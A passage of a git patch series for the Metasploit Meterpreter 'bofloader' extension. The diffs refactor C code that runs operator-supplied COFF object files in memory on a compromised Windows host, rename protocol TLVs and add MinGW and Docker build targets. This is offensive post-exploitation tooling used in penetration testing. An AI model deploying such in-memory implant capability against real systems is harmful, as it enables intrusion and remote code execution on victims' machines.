{E61592E1-28F4-4AFC-9EE1-9BE833A061C1}.r7_release|x64.ActiveCfg = Release|x64 @@ -420,18 +284,10 @@ Global {E61592E1-28F4-4AFC-9EE1-9BE833A061C1}.Release|Win32.Build.0 = Release|Win32 {E61592E1-28F4-4AFC-9EE1-9BE833A061C1}.Release|x64.ActiveCfg = Release|x64 {E61592E1-28F4-4AFC-9EE1-9BE833A061C1}.Release|x64.Build.0 = Release|x64 - {E61592E1-28F4-4AFC-9EE1-9BE833A061C1}.RelWithDebInfo|Win32.ActiveCfg = Release|Win32 - {E61592E1-28F4-4AFC-9EE1-9BE833A061C1}.RelWithDebInfo|Win32.Build.0 = Release|Win32 - {E61592E1-28F4-4AFC-9EE1-9BE833A061C1}.RelWithDebInfo|x64.ActiveCfg = Release|x64 - {E61592E1-28F4-4AFC-9EE1-9BE833A061C1}.RelWithDebInfo|x64.Build.0 = Release|x64 {486B160F-C571-486D-AAC3-CB60CEA7CBDD}.Debug|Win32.ActiveCfg = Debug|Win32 {486B160F-C571-486D-AAC3-CB60CEA7CBDD}.Debug|Win32.Build.0 = Debug|Win32 {486B160F-C571-486D-AAC3-CB60CEA7CBDD}.Debug|x64.ActiveCfg = Debug|x64 {486B160F-C571-486D-AAC3-CB60CEA7CBDD}.Debug|x64.Build.0 = Debug|x64 - {486B160F-C571-486D-AAC3-CB60CEA7CBDD}.MinSizeRel|Win32.ActiveCfg = Debug|Win32 - {486B160F-C571-486D-AAC3-CB60CEA7CBDD}.MinSizeRel|Win32.Build.0 = Debug|Win32 - {486B160F-C571-486D-AAC3-CB60CEA7CBDD}.MinSizeRel|x64.ActiveCfg = Debug|x64 - {486B160F-C571-486D-AAC3-CB60CEA7CBDD}.MinSizeRel|x64.Build.0 = Debug|x64 {486B160F-C571-486D-AAC3-CB60CEA7CBDD}.r7_release|Win32.ActiveCfg = r7_release|Win32 {486B160F-C571-486D-AAC3-CB60CEA7CBDD}.r7_release|Win32.Build.0 = r7_release|Win32 {486B160F-C571-486D-AAC3-CB60CEA7CBDD}.r7_release|x64.ActiveCfg = r7_release|x64 @@ -440,10 +296,6 @@ Global {486B160F-C571-486D-AAC3-CB60CEA7CBDD}.Release|Win32.Build.0 = Release|Win32 {486B160F-C571-486D-AAC3-CB60CEA7CBDD}.Release|x64.ActiveCfg = Release|x64 {486B160F-C571-486D-AAC3-CB60CEA7CBDD}.Release|x64.Build.0 = Release|x64 - {486B160F-C571-486D-AAC3-CB60CEA7CBDD}.RelWithDebInfo|Win32.ActiveCfg = Release|Win32 - {486B160F-C571-486D-AAC3-CB60CEA7CBDD}.RelWithDebInfo|Win32.Build.0 = Release|Win32 - {486B160F-C571-486D-AAC3-CB60CEA7CBDD}.RelWithDebInfo|x64.ActiveCfg = Release|x64 - {486B160F-C571-486D-AAC3-CB60CEA7CBDD}.RelWithDebInfo|x64.Build.0 = Release|x64 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE From cb230d93e5e90b036d4d23176d271ddf06661971 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Thu, 8 Sep 2022 16:07:00 -0400 Subject: [PATCH 10/17] Refactor a few things --- c/meterpreter/source/common/common.h | 2 +- .../bofloader/{main.c => bofloader.c} | 17 +++++------------ .../bofloader/{main.h => bofloader.h} | 0 .../ext_server_bofloader.vcxproj | 4 ++-- 4 files changed, 8 insertions(+), 15 deletions(-) rename c/meterpreter/source/extensions/bofloader/{main.c => bofloader.c} (89%) rename c/meterpreter/source/extensions/bofloader/{main.h => bofloader.h} (100%) diff --git a/c/meterpreter/source/common/common.h b/c/meterpreter/source/common/common.h index 957893f9..f496d678 100644 --- a/c/meterpreter/source/common/common.h +++ b/c/meterpreter/source/common/common.h @@ -80,7 +80,7 @@ typedef struct ___u128 { #define vdprintf(...) do{}while(0); #endif #else -#define dprintf(...) do{}while(0); +#define dprintf(...) real_dprintf(__VA_ARGS__) #define vdprintf(...) do{}while(0); #define SET_LOGGING_CONTEXT(...) #define INIT_LOGGING(...) diff --git a/c/meterpreter/source/extensions/bofloader/main.c b/c/meterpreter/source/extensions/bofloader/bofloader.c similarity index 89% rename from c/meterpreter/source/extensions/bofloader/main.c rename to c/meterpreter/source/extensions/bofloader/bofloader.c index 55bc23bf..ab710122 100644 --- a/c/meterpreter/source/extensions/bofloader/main.c +++ b/c/meterpreter/source/extensions/bofloader/bofloader.c @@ -1,12 +1,12 @@ /*! - * @file main.c + * @file bofloader.c * @brief Entry point for the bofloader extension. */ #include "common.h" #include "common_metapi.h" #include -#include "main.h" +#include "bofloader.h" #include "beacon_compatibility.h" #include "COFFLoader.h" @@ -15,10 +15,6 @@ MetApi* met_api = NULL; #define RDIDLL_NOEXPORT #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" - -extern int LoadAndRun(char *argsBuffer, uint32_t bufferSize); -extern char * BeaconGetOutputData(int *outsize); - DWORD request_exec_cmd(Remote *remote, Packet *packet); /*! @brief The enabled commands for this extension. */ @@ -28,7 +24,7 @@ Command customCommands[] = COMMAND_TERMINATOR }; -static int LoadAndRun(char* argsBuffer, uint32_t bufferSize) +static int load_and_run(char* argsBuffer, uint32_t bufferSize) { #if defined(_WIN32) // argsBuffer: functionname |coff_data | args_data @@ -85,13 +81,13 @@ DWORD request_exec_cmd(Remote *remote, Packet *packet) } buffer_size = packet->payloadLength; - args_buffer = (char *) met_api->packet.get_tlv_value_raw(packet, TLV_TYPE_BOFLOADER_CMD_EXEC, &buffer_size); + args_buffer = (char *)met_api->packet.get_tlv_value_raw(packet, TLV_TYPE_BOFLOADER_CMD_EXEC, &buffer_size); dprintf("[BOFLOADER] got pkt contents"); if (args_buffer != NULL) { dprintf("[BOFLOADER] calling LoadAndRun(%p, %u)", args_buffer, buffer_size); - if (LoadAndRun(args_buffer, (uint32_t)buffer_size)) + if (load_and_run(args_buffer, (uint32_t)buffer_size)) { dprintf("[BOFLOADER] load and run failed"); result = ERROR_BAD_COMMAND; @@ -129,12 +125,9 @@ DWORD request_exec_cmd(Remote *remote, Packet *packet) DWORD InitServerExtension(MetApi* api, Remote* remote) { - dprintf("[BOFLOADER] Loading..."); met_api = api; SET_LOGGING_CONTEXT(api) met_api->command.register_all(customCommands); - dprintf("[BOFLOADER] Loaded."); - return ERROR_SUCCESS; } diff --git a/c/meterpreter/source/extensions/bofloader/main.h b/c/meterpreter/source/extensions/bofloader/bofloader.h similarity index 100% rename from c/meterpreter/source/extensions/bofloader/main.h rename to c/meterpreter/source/extensions/bofloader/bofloader.h diff --git a/c/meterpreter/workspace/ext_server_bofloader/ext_server_bofloader.vcxproj b/c/meterpreter/workspace/ext_server_bofloader/ext_server_bofloader.vcxproj index 7f8f6a82..fa3a6041 100644 --- a/c/meterpreter/workspace/ext_server_bofloader/ext_server_bofloader.vcxproj +++ b/c/meterpreter/workspace/ext_server_bofloader/ext_server_bofloader.vcxproj @@ -29,7 +29,7 @@ - + @@ -41,7 +41,7 @@ 4018;4047;4244;4267;%(DisableSpecificWarnings) 4018;4047;4244;4267;%(DisableSpecificWarnings) - + From f2de5624e3c08f6fd52ea7f677be34315528dee3 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Thu, 8 Sep 2022 17:48:22 -0400 Subject: [PATCH 11/17] Rename some things that are not commands --- c/meterpreter/source/common/common_command_ids.h | 2 +- c/meterpreter/source/extensions/bofloader/bofloader.c | 7 +++---- c/meterpreter/source/extensions/bofloader/bofloader.h | 4 ++-- 3 files changed, 6 insertions(+), 7 deletions(-) diff --git a/c/meterpreter/source/common/common_command_ids.h b/c/meterpreter/source/common/common_command_ids.h index 74507dcc..1dc37393 100755 --- a/c/meterpreter/source/common/common_command_ids.h +++ b/c/meterpreter/source/common/common_command_ids.h @@ -230,6 +230,6 @@ #define COMMAND_ID_LANATTACKS_STOP_TFTP 15009 #define COMMAND_ID_PEINJECTOR_INJECT_SHELLCODE 16001 #define COMMAND_ID_MIMIKATZ_CUSTOM_COMMAND 17001 -#define COMMAND_ID_BOFLOADER_EXEC_CMD 18001 +#define COMMAND_ID_BOFLOADER_EXECUTE 18001 #endif diff --git a/c/meterpreter/source/extensions/bofloader/bofloader.c b/c/meterpreter/source/extensions/bofloader/bofloader.c index ab710122..c5ad1127 100644 --- a/c/meterpreter/source/extensions/bofloader/bofloader.c +++ b/c/meterpreter/source/extensions/bofloader/bofloader.c @@ -20,7 +20,7 @@ DWORD request_exec_cmd(Remote *remote, Packet *packet); /*! @brief The enabled commands for this extension. */ Command customCommands[] = { - COMMAND_REQ(COMMAND_ID_BOFLOADER_EXEC_CMD, request_exec_cmd), + COMMAND_REQ(COMMAND_ID_BOFLOADER_EXECUTE, request_exec_cmd), COMMAND_TERMINATOR }; @@ -81,7 +81,7 @@ DWORD request_exec_cmd(Remote *remote, Packet *packet) } buffer_size = packet->payloadLength; - args_buffer = (char *)met_api->packet.get_tlv_value_raw(packet, TLV_TYPE_BOFLOADER_CMD_EXEC, &buffer_size); + args_buffer = (char *)met_api->packet.get_tlv_value_raw(packet, TLV_TYPE_BOFLOADER_EXECUTE_BUFFER, &buffer_size); dprintf("[BOFLOADER] got pkt contents"); if (args_buffer != NULL) @@ -100,7 +100,7 @@ DWORD request_exec_cmd(Remote *remote, Packet *packet) if (output_data) { - met_api->packet.add_tlv_string(response, TLV_TYPE_BOFLOADER_CMD_RESULT, output_data); + met_api->packet.add_tlv_string(response, TLV_TYPE_BOFLOADER_EXECUTE_RESULT, output_data); } } else @@ -122,7 +122,6 @@ DWORD request_exec_cmd(Remote *remote, Packet *packet) * @param remote Pointer to the remote instance. * @return Indication of success or failure. */ - DWORD InitServerExtension(MetApi* api, Remote* remote) { met_api = api; diff --git a/c/meterpreter/source/extensions/bofloader/bofloader.h b/c/meterpreter/source/extensions/bofloader/bofloader.h index 3ebc02f8..d74957ac 100644 --- a/c/meterpreter/source/extensions/bofloader/bofloader.h +++ b/c/meterpreter/source/extensions/bofloader/bofloader.h @@ -9,7 +9,7 @@ #define TLV_TYPE_EXTENSION_BOF 0 -#define TLV_TYPE_BOFLOADER_CMD_EXEC MAKE_CUSTOM_TLV(TLV_META_TYPE_RAW, TLV_TYPE_EXTENSION_BOF, TLV_EXTENSIONS + 100) -#define TLV_TYPE_BOFLOADER_CMD_RESULT MAKE_CUSTOM_TLV(TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_BOF, TLV_EXTENSIONS + 101) +#define TLV_TYPE_BOFLOADER_EXECUTE_BUFFER MAKE_CUSTOM_TLV(TLV_META_TYPE_RAW, TLV_TYPE_EXTENSION_BOF, TLV_EXTENSIONS + 100) +#define TLV_TYPE_BOFLOADER_EXECUTE_RESULT MAKE_CUSTOM_TLV(TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_BOF, TLV_EXTENSIONS + 101) #endif From 1f62d226a02e39b45e3e3ea9e4707ade9bfcf1a0 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Fri, 9 Sep 2022 11:52:58 -0400 Subject: [PATCH 12/17] Use multiple TLVs instead of load_and_run --- .../source/extensions/bofloader/bofloader.c | 122 +++++++----------- .../source/extensions/bofloader/bofloader.h | 6 +- 2 files changed, 50 insertions(+), 78 deletions(-) diff --git a/c/meterpreter/source/extensions/bofloader/bofloader.c b/c/meterpreter/source/extensions/bofloader/bofloader.c index c5ad1127..318cdc28 100644 --- a/c/meterpreter/source/extensions/bofloader/bofloader.c +++ b/c/meterpreter/source/extensions/bofloader/bofloader.c @@ -15,105 +15,75 @@ MetApi* met_api = NULL; #define RDIDLL_NOEXPORT #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" -DWORD request_exec_cmd(Remote *remote, Packet *packet); +DWORD request_execute(Remote *remote, Packet *packet); /*! @brief The enabled commands for this extension. */ Command customCommands[] = { - COMMAND_REQ(COMMAND_ID_BOFLOADER_EXECUTE, request_exec_cmd), + COMMAND_REQ(COMMAND_ID_BOFLOADER_EXECUTE, request_execute), COMMAND_TERMINATOR }; -static int load_and_run(char* argsBuffer, uint32_t bufferSize) -{ -#if defined(_WIN32) - // argsBuffer: functionname |coff_data | args_data - datap parser; - char* functionName; - unsigned char* coff_data = NULL; - unsigned char* arguments_data = NULL; - int filesize = 0; - int arguments_size = 0; - - BeaconDataParse(&parser, argsBuffer, bufferSize); - functionName = BeaconDataExtract(&parser, NULL); - if (functionName == NULL) - { - return 1; - } - coff_data = (unsigned char*)BeaconDataExtract(&parser, &filesize); - if (coff_data == NULL) - { - return 1; - } - arguments_data = (unsigned char*)BeaconDataExtract(&parser, &arguments_size); - if (arguments_data == NULL) - { - return 1; - } - - return RunCOFF(functionName, coff_data, filesize, arguments_data, arguments_size); -#else - return 0; -#endif -} - /*! * @brief Handler for the generic command execution function. * @param remote Pointer to the \c Remote instance. * @param packet Pointer to the incoming packet. * @returns \c ERROR_SUCCESS */ -DWORD request_exec_cmd(Remote *remote, Packet *packet) +DWORD request_execute(Remote* remote, Packet* packet) { - DWORD result = ERROR_SUCCESS; - int outdata_size = 0; - DWORD buffer_size = 0; - Packet * response = met_api->packet.create_response(packet); - char * output_data = NULL; - char * args_buffer = NULL; + DWORD dwResult = ERROR_BAD_ARGUMENTS; + Packet* response = NULL; + PBYTE pBuffer = NULL; + DWORD dwBufferSize = 0; + LPSTR pBufferEntry = NULL; + PBYTE pArguments = NULL; + DWORD dwArgumentsSize = 0; + LPSTR pOutputData = NULL; + DWORD dwOutputDataSize = 0; - dprintf("[BOFLOADER] Inside request cmd"); - if (NULL == response) + do { - // Don't delete the response! - return ERROR_OUTOFMEMORY; - } + response = met_api->packet.create_response(packet); + if (!response) + BREAK_WITH_ERROR("[BOFLOADER] met_api->packet.create_response failed", ERROR_INVALID_HANDLE); - buffer_size = packet->payloadLength; - args_buffer = (char *)met_api->packet.get_tlv_value_raw(packet, TLV_TYPE_BOFLOADER_EXECUTE_BUFFER, &buffer_size); - dprintf("[BOFLOADER] got pkt contents"); + pBuffer = met_api->packet.get_tlv_value_raw(packet, TLV_TYPE_BOFLOADER_EXECUTE_BUFFER, &dwBufferSize); + if (!pBuffer) + BREAK_WITH_ERROR("[BOFLOADER] No EXECUTE_BUFFER was specified", ERROR_BAD_ARGUMENTS); - if (args_buffer != NULL) - { - dprintf("[BOFLOADER] calling LoadAndRun(%p, %u)", args_buffer, buffer_size); - if (load_and_run(args_buffer, (uint32_t)buffer_size)) - { - dprintf("[BOFLOADER] load and run failed"); - result = ERROR_BAD_COMMAND; - } - else - { - dprintf("[BOFLOADER] getting out data"); - output_data = BeaconGetOutputData(&outdata_size); - } + pBufferEntry = met_api->packet.get_tlv_value_string(packet, TLV_TYPE_BOFLOADER_EXECUTE_BUFFER_ENTRY); + if (!pBufferEntry) + BREAK_WITH_ERROR("[BOFLOADER] No EXECUTE_BUFFER_ENTRY was specified", ERROR_BAD_ARGUMENTS); + + pArguments = met_api->packet.get_tlv_value_raw(packet, TLV_TYPE_BOFLOADER_EXECUTE_ARGUMENTS, &dwArgumentsSize); + if (!pArguments) + BREAK_WITH_ERROR("[BOFLOADER] No EXECUTE_ARGUMENTS was specified", ERROR_BAD_ARGUMENTS); + + + /* do our own check here to make sure the COFF data machine type matches, return ERROR_EXE_MACHINE_TYPE_MISMATCH on failure + */ + if (RunCOFF(pBufferEntry, pBuffer, dwBufferSize, pArguments, dwArgumentsSize)) + BREAK_WITH_ERROR("[BOFLOADER] Buffer execution failed", ERROR_ERRORS_ENCOUNTERED); + dprintf("[BOFLOADER] Buffer execution succeeded"); - if (output_data) - { - met_api->packet.add_tlv_string(response, TLV_TYPE_BOFLOADER_EXECUTE_RESULT, output_data); + dprintf("[BOFLOADER] Getting output data"); + pOutputData = BeaconGetOutputData(&dwOutputDataSize); + if (pOutputData) { + met_api->packet.add_tlv_string(response, TLV_TYPE_BOFLOADER_EXECUTE_RESULT, pOutputData); + ZeroMemory(pOutputData, dwOutputDataSize); + free(pOutputData); } - } - else + dwResult = ERROR_SUCCESS; + + } while (0); + + if (response) { - result = ERROR_INVALID_PARAMETER; + met_api->packet.transmit_response(dwResult, remote, response); } - dprintf("[BOFLOADER] Finished executing, if success will recv output data."); - met_api->packet.transmit_response(result, remote, response); - - dprintf("[BOFLOADER] Done."); - - return ERROR_SUCCESS; + return dwResult; } /*! diff --git a/c/meterpreter/source/extensions/bofloader/bofloader.h b/c/meterpreter/source/extensions/bofloader/bofloader.h index d74957ac..6270609c 100644 --- a/c/meterpreter/source/extensions/bofloader/bofloader.h +++ b/c/meterpreter/source/extensions/bofloader/bofloader.h @@ -9,7 +9,9 @@ #define TLV_TYPE_EXTENSION_BOF 0 -#define TLV_TYPE_BOFLOADER_EXECUTE_BUFFER MAKE_CUSTOM_TLV(TLV_META_TYPE_RAW, TLV_TYPE_EXTENSION_BOF, TLV_EXTENSIONS + 100) -#define TLV_TYPE_BOFLOADER_EXECUTE_RESULT MAKE_CUSTOM_TLV(TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_BOF, TLV_EXTENSIONS + 101) +#define TLV_TYPE_BOFLOADER_EXECUTE_BUFFER MAKE_CUSTOM_TLV(TLV_META_TYPE_RAW, TLV_TYPE_EXTENSION_BOF, TLV_EXTENSIONS + 100) +#define TLV_TYPE_BOFLOADER_EXECUTE_BUFFER_ENTRY MAKE_CUSTOM_TLV(TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_BOF, TLV_EXTENSIONS + 101) +#define TLV_TYPE_BOFLOADER_EXECUTE_ARGUMENTS MAKE_CUSTOM_TLV(TLV_META_TYPE_RAW, TLV_TYPE_EXTENSION_BOF, TLV_EXTENSIONS + 102) +#define TLV_TYPE_BOFLOADER_EXECUTE_RESULT MAKE_CUSTOM_TLV(TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_BOF, TLV_EXTENSIONS + 103) #endif From a3e6d86026a5d8374c425133280b7225bdeaf9c8 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Fri, 9 Sep 2022 12:44:43 -0400 Subject: [PATCH 13/17] Revert accidental change --- c/meterpreter/source/common/common.h | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/c/meterpreter/source/common/common.h b/c/meterpreter/source/common/common.h index f496d678..957893f9 100644 --- a/c/meterpreter/source/common/common.h +++ b/c/meterpreter/source/common/common.h @@ -80,7 +80,7 @@ typedef struct ___u128 { #define vdprintf(...) do{}while(0); #endif #else -#define dprintf(...) real_dprintf(__VA_ARGS__) +#define dprintf(...) do{}while(0); #define vdprintf(...) do{}while(0); #define SET_LOGGING_CONTEXT(...) #define INIT_LOGGING(...) From 09001bd5397a0b171c4b0b12cd96a0b56c2e44ef Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Fri, 9 Sep 2022 13:41:08 -0400 Subject: [PATCH 14/17] Get MinGW bofloader builds working --- c/meterpreter/Makefile | 29 +++++++++++++++++++ .../source/extensions/bofloader/bofloader.c | 2 +- .../ext_server_bofloader/CMakeLists.txt | 3 +- 3 files changed, 32 insertions(+), 2 deletions(-) diff --git a/c/meterpreter/Makefile b/c/meterpreter/Makefile index 02eaad58..fafa77db 100644 --- a/c/meterpreter/Makefile +++ b/c/meterpreter/Makefile @@ -264,6 +264,26 @@ meterpreter-ext-peinjector-x64-gen: meterpreter-ext-peinjector-x64-build: @cmake --build workspace/build/mingw-x64-ext-peinjector $(COMMON_BUILD) +### BofLoader + +meterpreter-ext-bofloader: meterpreter-ext-bofloader-x86 meterpreter-ext-bofloader-x64 + +meterpreter-ext-bofloader-x86: meterpreter-ext-bofloader-x86-gen meterpreter-ext-bofloader-x86-build + +meterpreter-ext-bofloader-x86-gen: + @cmake -S workspace -B workspace/build/mingw-x86-ext-bofloader -DBUILD_ALL=OFF -DBUILD_EXT_bofloader=ON $(COMMON_GEN_X86) + +meterpreter-ext-bofloader-x86-build: + @cmake --build workspace/build/mingw-x86-ext-bofloader $(COMMON_BUILD) + +meterpreter-ext-bofloader-x64: meterpreter-ext-bofloader-x64-gen meterpreter-ext-bofloader-x64-build + +meterpreter-ext-bofloader-x64-gen: + @cmake -S workspace -B workspace/build/mingw-x64-ext-bofloader -DBUILD_ALL=OFF -DBUILD_EXT_bofloader=ON $(COMMON_GEN_X64) + +meterpreter-ext-bofloader-x64-build: + @cmake --build workspace/build/mingw-x64-ext-bofloader $(COMMON_BUILD) + ########################################################################################## ### Container-based Builds ########################################################################################## @@ -381,3 +401,12 @@ docker-ext-peinjector-x86: docker-ext-peinjector-x64: @docker run -u $(ID):$(ID) -it -v ${PWD}:/meterpreter -w /meterpreter --rm $(DOCKER_CONTAINER) make meterpreter-ext-peinjector-x64 + +docker-ext-bofloader: + @docker run -u $(ID):$(ID) -it -v ${PWD}:/meterpreter -w /meterpreter --rm $(DOCKER_CONTAINER) make meterpreter-ext-bofloader + +docker-ext-bofloader-x86: + @docker run -u $(ID):$(ID) -it -v ${PWD}:/meterpreter -w /meterpreter --rm $(DOCKER_CONTAINER) make meterpreter-ext-bofloader-x86 + +docker-ext-bofloader-x64: + @docker run -u $(ID):$(ID) -it -v ${PWD}:/meterpreter -w /meterpreter --rm $(DOCKER_CONTAINER) make meterpreter-ext-bofloader-x64 diff --git a/c/meterpreter/source/extensions/bofloader/bofloader.c b/c/meterpreter/source/extensions/bofloader/bofloader.c index 318cdc28..8113f094 100644 --- a/c/meterpreter/source/extensions/bofloader/bofloader.c +++ b/c/meterpreter/source/extensions/bofloader/bofloader.c @@ -64,7 +64,7 @@ DWORD request_execute(Remote* remote, Packet* packet) /* do our own check here to make sure the COFF data machine type matches, return ERROR_EXE_MACHINE_TYPE_MISMATCH on failure */ if (RunCOFF(pBufferEntry, pBuffer, dwBufferSize, pArguments, dwArgumentsSize)) - BREAK_WITH_ERROR("[BOFLOADER] Buffer execution failed", ERROR_ERRORS_ENCOUNTERED); + BREAK_WITH_ERROR("[BOFLOADER] Buffer execution failed", ERROR_INVALID_DATA); dprintf("[BOFLOADER] Buffer execution succeeded"); dprintf("[BOFLOADER] Getting output data"); diff --git a/c/meterpreter/workspace/ext_server_bofloader/CMakeLists.txt b/c/meterpreter/workspace/ext_server_bofloader/CMakeLists.txt index 5aa8c130..702c7f64 100644 --- a/c/meterpreter/workspace/ext_server_bofloader/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_bofloader/CMakeLists.txt @@ -14,12 +14,13 @@ endif() include_directories(../../source/common) include_directories(../../source/ReflectiveDLLInjection/common) +include_directories(../../source/extensions/bofloader/COFFLoader) set(SRC_DIR ../../source/extensions/bofloader) # Unfortunately we have to be a little judicious with what we include set(SRC_FILES - ${SRC_DIR}/main.c + ${SRC_DIR}/bofloader.c ${SRC_DIR}/COFFLoader/beacon_compatibility.c ${SRC_DIR}/COFFLoader/COFFLoader.c ${MOD_DEF_DIR}/extension.def From 4582587df41d3eb6ad00bcf2ab7d8dde412c0708 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Fri, 9 Sep 2022 13:50:15 -0400 Subject: [PATCH 15/17] Pull upstream changes, stop disabing warnings --- c/meterpreter/source/extensions/bofloader/COFFLoader | 2 +- .../ext_server_bofloader/ext_server_bofloader.vcxproj | 9 +-------- 2 files changed, 2 insertions(+), 9 deletions(-) diff --git a/c/meterpreter/source/extensions/bofloader/COFFLoader b/c/meterpreter/source/extensions/bofloader/COFFLoader index d69bc130..24da1683 160000 --- a/c/meterpreter/source/extensions/bofloader/COFFLoader +++ b/c/meterpreter/source/extensions/bofloader/COFFLoader @@ -1 +1 @@ -Subproject commit d69bc130ccdd6229b90307b0cef05f255587323b +Subproject commit 24da168356bd20438a4e66ef3261c5012344d362 diff --git a/c/meterpreter/workspace/ext_server_bofloader/ext_server_bofloader.vcxproj b/c/meterpreter/workspace/ext_server_bofloader/ext_server_bofloader.vcxproj index fa3a6041..aba73341 100644 --- a/c/meterpreter/workspace/ext_server_bofloader/ext_server_bofloader.vcxproj +++ b/c/meterpreter/workspace/ext_server_bofloader/ext_server_bofloader.vcxproj @@ -33,14 +33,7 @@ - - 4018;4047;4244;4267;%(DisableSpecificWarnings) - 4018;4047;4244;4267;%(DisableSpecificWarnings) - 4018;4047;4244;4267;%(DisableSpecificWarnings) - 4018;4047;4244;4267;%(DisableSpecificWarnings) - 4018;4047;4244;4267;%(DisableSpecificWarnings) - 4018;4047;4244;4267;%(DisableSpecificWarnings) - + From 73e8f4f78e18fb1b7ae05b226efeae316ddf2e9c Mon Sep 17 00:00:00 2001 From: joe Date: Mon, 12 Sep 2022 20:18:52 -0400 Subject: [PATCH 16/17] secure memzero --- c/meterpreter/source/extensions/bofloader/bofloader.c | 5 +---- c/meterpreter/source/extensions/bofloader/bofloader.h | 4 +++- 2 files changed, 4 insertions(+), 5 deletions(-) diff --git a/c/meterpreter/source/extensions/bofloader/bofloader.c b/c/meterpreter/source/extensions/bofloader/bofloader.c index 8113f094..8e8fe5d6 100644 --- a/c/meterpreter/source/extensions/bofloader/bofloader.c +++ b/c/meterpreter/source/extensions/bofloader/bofloader.c @@ -15,8 +15,6 @@ MetApi* met_api = NULL; #define RDIDLL_NOEXPORT #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" -DWORD request_execute(Remote *remote, Packet *packet); - /*! @brief The enabled commands for this extension. */ Command customCommands[] = { @@ -60,7 +58,6 @@ DWORD request_execute(Remote* remote, Packet* packet) if (!pArguments) BREAK_WITH_ERROR("[BOFLOADER] No EXECUTE_ARGUMENTS was specified", ERROR_BAD_ARGUMENTS); - /* do our own check here to make sure the COFF data machine type matches, return ERROR_EXE_MACHINE_TYPE_MISMATCH on failure */ if (RunCOFF(pBufferEntry, pBuffer, dwBufferSize, pArguments, dwArgumentsSize)) @@ -71,7 +68,7 @@ DWORD request_execute(Remote* remote, Packet* packet) pOutputData = BeaconGetOutputData(&dwOutputDataSize); if (pOutputData) { met_api->packet.add_tlv_string(response, TLV_TYPE_BOFLOADER_EXECUTE_RESULT, pOutputData); - ZeroMemory(pOutputData, dwOutputDataSize); + SecureZeroMemory(pOutputData, dwOutputDataSize); free(pOutputData); } dwResult = ERROR_SUCCESS; diff --git a/c/meterpreter/source/extensions/bofloader/bofloader.h b/c/meterpreter/source/extensions/bofloader/bofloader.h index 6270609c..db32de9d 100644 --- a/c/meterpreter/source/extensions/bofloader/bofloader.h +++ b/c/meterpreter/source/extensions/bofloader/bofloader.h @@ -14,4 +14,6 @@ #define TLV_TYPE_BOFLOADER_EXECUTE_ARGUMENTS MAKE_CUSTOM_TLV(TLV_META_TYPE_RAW, TLV_TYPE_EXTENSION_BOF, TLV_EXTENSIONS + 102) #define TLV_TYPE_BOFLOADER_EXECUTE_RESULT MAKE_CUSTOM_TLV(TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_BOF, TLV_EXTENSIONS + 103) -#endif +DWORD request_execute(Remote *remote, Packet *packet); + +#endif //_METERPRETER_SOURCE_EXTENSION_BOF_BOF_H From b0ce0fb421d19dda3f597870a95149909024dffb Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Mon, 26 Sep 2022 08:49:08 -0400 Subject: [PATCH 17/17] Update the COFFLoader submodule --- c/meterpreter/source/extensions/bofloader/COFFLoader | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/c/meterpreter/source/extensions/bofloader/COFFLoader b/c/meterpreter/source/extensions/bofloader/COFFLoader index 24da1683..a03af2dc 160000 --- a/c/meterpreter/source/extensions/bofloader/COFFLoader +++ b/c/meterpreter/source/extensions/bofloader/COFFLoader @@ -1 +1 @@ -Subproject commit 24da168356bd20438a4e66ef3261c5012344d362 +Subproject commit a03af2dc82792efa013afbaeb182de8d957a644b